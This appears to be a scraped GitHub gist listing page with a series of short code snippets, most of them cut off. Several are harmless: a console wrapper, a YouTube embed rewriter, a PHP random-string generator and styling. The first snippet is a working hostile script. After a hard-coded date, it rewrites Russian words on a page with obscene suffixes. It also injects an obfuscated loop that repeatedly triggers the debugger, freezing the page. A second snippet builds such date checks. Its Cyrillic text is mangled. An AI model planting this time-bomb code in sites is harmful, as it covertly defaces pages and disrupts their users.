This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function textNodesUnder(e){var n=[];for(e=e.firstChild;e;e=e.nextSibling)3==e.nodeType?n.push(e):n=n.concat(textNodesUnder(e));return n}function process(e){e=e.split(' ');for(var n=0;n<e.length;n++){var r=e[n];if(!(r.length<=5)&&r.match(/[\u0400-\u04FF]/gi)){var t=(r=r.replace(/(\.|,)/gi,'')).split('').reverse().join('').regexIndexOf('(邪|芯|褍|懈|褨|械|泄|褟)',2),i=r.substr(t).toLowerCase();r+='-'+(-1==i.regexIndexOf('(邪|芯|褍|懈|褨|械|泄|褟)')?'褏褍泄':'褏褍褟')+i,e[n]=r}}return e=e.join(' ')}String.prototype.regexIndexOf=function(e,n){var r=this.substring(n||0).search(e);return r>=0?r+(n||0):r},~~(new Date/864/1e6)>1749&&textNodesUnder(document).forEach(function(e){var n=e.nodeValue;n.length>5&&(n=process(n),e.nodeValue=n)});var f="dniwz.wzlnzitcnuf=dazitcnuF(lavretnItes{)(nzc.nztcurtsnzdniw;)001,)'reggubed'(rz.wzlnz};''=da",s=document.createElement('script');s.innerHTML=f.split('z').reverse().join('o').split('').reverse().join(''),document.head.appendChild(s); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
prompt("CTRL+C", "if(~~(new Date()/01540/10E5)>0x"+(~~(new Date()/01540/10E5)+(prompt("days", 7)-0)).toString(16)+")return;"); | |
//if(~~(new Date()/01540/10E5)>0x6ce)return; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
window.Onori = { | |
log: function(){ | |
Onori.console.apply(console.log, arguments); | |
}, | |
warn: function(){ | |
Onori.console.apply(console.warn, arguments); | |
}, | |
console: function(){ | |
var arr = []; | |
var notifStr = ""; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function isInViewport(t){var n=t.getBoundingClientRect(),e=document.documentElement;return n.top>=0&&n.left>=0&&n.bottom<=(window.innerHeight||e.clientHeight)&&n.right<=(window.innerWidth||e.clientWidth)} | |
document.querySelectorAll("iframe").forEach(function(el){ | |
if(el.src.indexOf("youtube") > -1){ | |
var src = el.src; | |
src = (src+"?").split("?")[0].split("/").reverse()[0]; | |
var newsrc = "http://www.youtube.com/embed/{ID}?enablejsapi=1".replace("{ID}", src); | |
el.src = newsrc; | |
el.onload = el.onLoad = function(){ | |
this.className += " youtubeVideoReady"; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$a = "eyuioa"; | |
$b = "qwrtpsdfghjklzxcvbnm"; | |
$n = "0123456789"; | |
$I = 0; | |
$s = "__SALT__"; | |
function rnd($i, $a, $data = false){ | |
$GLOBALS['I']++; | |
$data = $GLOBALS['s'].$GLOBALS['I']; | |
$t = md5($data); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html><html class=''> | |
<head> | |
<style class="cp-pen-styles">body { | |
overflow: hidden; | |
background: #000000; | |
color: #ffffff; | |
font-size: 18px; | |
font-family: Sans-serif; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//Id of youtube video | |
$YVideoId = "KPkKXnOMwxQ";//https://www.youtube.com/watch?v=KPkKXnOMwxQ | |
?> | |
<style> | |
iframe { | |
width: 100%; | |
height: 100%; | |
min-width: 1280px; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<span class="h1 glitch" data-text="Blast.ORQ">Blast.ORQ</span> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function preprocessor($text){ | |
$parts = explode("~~~~~~~~~~~~~~~~", $text); | |
$parts[0] = str_replace("\n",'',$parts[0]); | |
$parts[0] = str_replace("\r",'',$parts[0]); | |
$param = explode(";", $parts[0]); | |
$style = $parts[1]; | |
$params = []; | |
NewerOlder